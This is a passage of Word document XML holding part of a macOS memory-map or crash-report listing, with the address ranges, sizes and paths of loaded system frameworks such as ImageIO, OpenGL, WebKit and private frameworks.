    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbed42000-00007fffbed6a000 [  160K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbed6a000-00007fffbed6d000 [   12K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbed6d000-00007fffbedc7000 [  360K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbeee6000-00007fffbf988000 [ 10.6M] r-x/r-x SM=COW  /System/Library/Frameworks/JavaScriptCore.framework/Versions/A/JavaScriptCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbf988000-00007fffbf9a2000 [  104K] r-x/r-x SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbf9a2000-00007fffbf9d9000 [  220K] r-x/r-x SM=COW  /System/Library/Frameworks/LDAP.framework/Versions/A/LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbfc1c000-00007fffbfc23000 [   28K] r-x/r-x SM=COW  /System/Library/Frameworks/MediaAccessibility.framework/Versions/A/MediaAccessibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffbfc38000-00007fffc0188000 [ 5440K] r-x/r-x SM=COW  /System/Library/Frameworks/MediaToolbox.framework/Versions/A/MediaToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc0188000-00007fffc01e0000 [  352K] r-x/r-x SM=COW  /System/Library/Frameworks/Metal.framework/Versions/A/Metal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc08f5000-00007fffc08fe000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0ad1000-00007fffc0ada000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/libcldcpuengine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0ada000-00007fffc0bc1000 [  924K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/ImageFormats/unorm8_bgra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0ca2000-00007fffc0cf1000 [  316K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/OpenCL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0cf1000-00007fffc0d0b000 [  104K] r-x/r-x SM=COW  ...rameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d0b000-00007fffc0d17000 [   48K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d17000-00007fffc0d1a000 [   12K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d1a000-00007fffc0d1e000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d1e000-00007fffc0d22000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d22000-00007fffc0d2b000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d2b000-00007fffc0d37000 [   48K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc0d37000-00007fffc0d74000 [  244K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc0eeb000-00007fffc0f2c000 [  260K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc1893000-00007fffc18a2000 [   60K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc1b0a000-00007fffc1c52000 [ 1312K] r-x/r-x SM=COW  /System/Library/Frameworks/QTKit.framework/Versions/A/QTKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc1c52000-00007fffc1ebe000 [ 2480K] r-x/r-x SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/ImageKit.framework/Versions/A/ImageKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc1ebe000-00007fffc1f79000 [  748K] r-x/r-x SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/PDFKit.framework/Versions/A/PDFKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc1f79000-00007fffc24a0000 [ 5276K] r-x/r-x SM=COW  ...Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzComposer.framework/Versions/A/QuartzComposer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc24a0000-00007fffc24c4000 [  144K] r-x/r-x SM=COW  ...m/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzFilters.framework/Versions/A/QuartzFilters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc24c4000-00007fffc25b2000 [  952K] r-x/r-x SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/QuickLookUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc25b2000-00007fffc25b3000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Quartz.framework/Versions/A/Quartz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc25b3000-00007fffc27ae000 [ 2028K] r-x/r-x SM=COW  /System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc27ae000-00007fffc2804000 [  344K] r-x/r-x SM=COW  /System/Library/Frameworks/QuickLook.framework/Versions/A/QuickLook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc2804000-00007fffc2818000 [   80K] r-x/r-x SM=COW  /System/Library/Frameworks/SafariServices.framework/Versions/A/SafariServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc2d13000-00007fffc302f000 [ 3184K] r-x/r-x SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc302f000-00007fffc30a6000 [  476K] r-x/r-x SM=COW  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc30a6000-00007fffc30cf000 [  164K] r-x/r-x SM=COW  /System/Library/Frameworks/SecurityInterface.framework/Versions/A/SecurityInterface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc30cf000-00007fffc30d3000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc30d3000-00007fffc311e000 [  300K] r-x/r-x SM=COW  /System/Library/Frameworks/Social.framework/Versions/A/Social</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc3457000-00007fffc34c9000 [  456K] r-x/r-x SM=COW  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc34c9000-00007fffc3875000 [ 3760K] r-x/r-x SM=COW  /System/Library/Frameworks/VideoToolbox.framework/Versions/A/VideoToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc3875000-00007fffc4aaa000 [ 18.2M] r-x/r-x SM=COW  /System/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebCore.framework/Versions/A/WebCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc4aaa000-00007fffc4c10000 [ 1432K] r-x/r-x SM=COW  ...tem/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebKitLegacy.framework/Versions/A/WebKitLegacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc4c10000-00007fffc4f7c000 [ 3504K] r-x/r-x SM=COW  /System/Library/Frameworks/WebKit.framework/Versions/A/WebKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc537b000-00007fffc5381000 [   24K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/APFS.framework/Versions/A/APFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc57bc000-00007fffc586a000 [  696K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AccountsDaemon.framework/Versions/A/AccountsDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc586a000-00007fffc589f000 [  212K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AccountsUI.framework/Versions/A/AccountsUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5ae0000-00007fffc5afc000 [  112K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppContainer.framework/Versions/A/AppContainer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc5afc000-00007fffc5b0a000 [   56K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppSandbox.framework/Versions/A/AppSandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5b0a000-00007fffc5b2d000 [  140K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Apple80211</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5b2d000-00007fffc5b3d000 [   64K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleFSCompression.framework/Versions/A/AppleFSCompression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5c25000-00007fffc5cb1000 [  560K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5cc4000-00007fffc5ce0000 [  112K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ApplePushService.framework/Versions/A/ApplePushService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5ce0000-00007fffc5ce9000 [   36K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5ce9000-00007fffc5ced000 [   16K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleSystemInfo.framework/Versions/A/AppleSystemInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5ced000-00007fffc5d40000 [  332K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleVA.framework/Versions/A/AppleVA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc5d48000-00007fffc5d50000 [   32K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AssetCacheServices.framework/Versions/A/AssetCacheServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc60cc000-00007fffc614b000 [  508K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Backup.framework/Versions/A/Backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc615a000-00007fffc6198000 [  248K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Bom.framework/Versions/A/Bom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc63c4000-00007fffc63f1000 [  180K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CacheDelete.framework/Versions/A/CacheDelete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc67ba000-00007fffc67e2000 [  160K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CalendarAgentLink.framework/Versions/A/CalendarAgentLink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc6d68000-00007fffc6d90000 [  160K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc6d90000-00007fffc6e23000 [  588K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc76b6000-00007fffc76c0000 [   40K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7785000-00007fffc77d4000 [  316K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ContactsFoundation.framework/Versions/A/ContactsFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc77d4000-00007fffc77f7000 [  140K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ContactsPersistence.framework/Versions/A/ContactsPersistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7840000-00007fffc7c1e000 [ 3960K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreAUC.framework/Versions/A/CoreAUC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7c1e000-00007fffc7c4f000 [  196K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreAVCHD.framework/Versions/A/CoreAVCHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7cc3000-00007fffc7ccc000 [   36K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7ddb000-00007fffc7ded000 [   72K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreEmoji.framework/Versions/A/CoreEmoji</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7ea1000-00007fffc7eb8000 [   92K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreMediaAuthoring.framework/Versions/A/CoreMediaAuthoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc7ebe000-00007fffc7f4f000 [  580K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CorePDF.framework/Versions/A/CorePDF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc80ce000-00007fffc80ff000 [  196K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInternal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8387000-00007fffc8412000 [  556K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffc8412000-00007fffc8551000 [ 1276K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreUI.framework/Versions/A/CoreUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8551000-00007fffc85f1000 [  640K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreUtils.framework/Versions/A/CoreUtils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8640000-00007fffc86a6000 [  408K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreWiFi.framework/Versions/A/CoreWiFi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc86a6000-00007fffc86b4000 [   56K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8725000-00007fffc8759000 [  208K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DataDetectors.framework/Versions/A/DataDetectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8759000-00007fffc87d1000 [  480K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc880a000-00007fffc884a000 [  256K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc884a000-00007fffc895c000 [ 1096K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8960000-00007fffc8a37000 [  860K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8a9a000-00007fffc8aa5000 [   44K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DisplayServices.framework/Versions/A/DisplayServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8ae9000-00007fffc8aec000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/EFILogin.framework/Versions/A/EFILogin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc8c27000-00007fffc9059000 [ 4296K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc9094000-00007fffc940d000 [ 3556K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/FinderKit.framework/Versions/A/FinderKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffca393000-00007fffca394000 [    4K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GPUCompiler.framework/libmetal_timestamp.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fffca3a0000-00007fffca3ac000 [   48K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GPUSupport.framework/Versions/A/Libraries/libGPUSupportMercury.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffca65d000-00007fffca67a000 [  116K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffca691000-00007fffcad2a000 [ 6756K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffcad6f000-00007fffcade6000 [  476K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal</w:t>
      </w:r>
    </w:p>
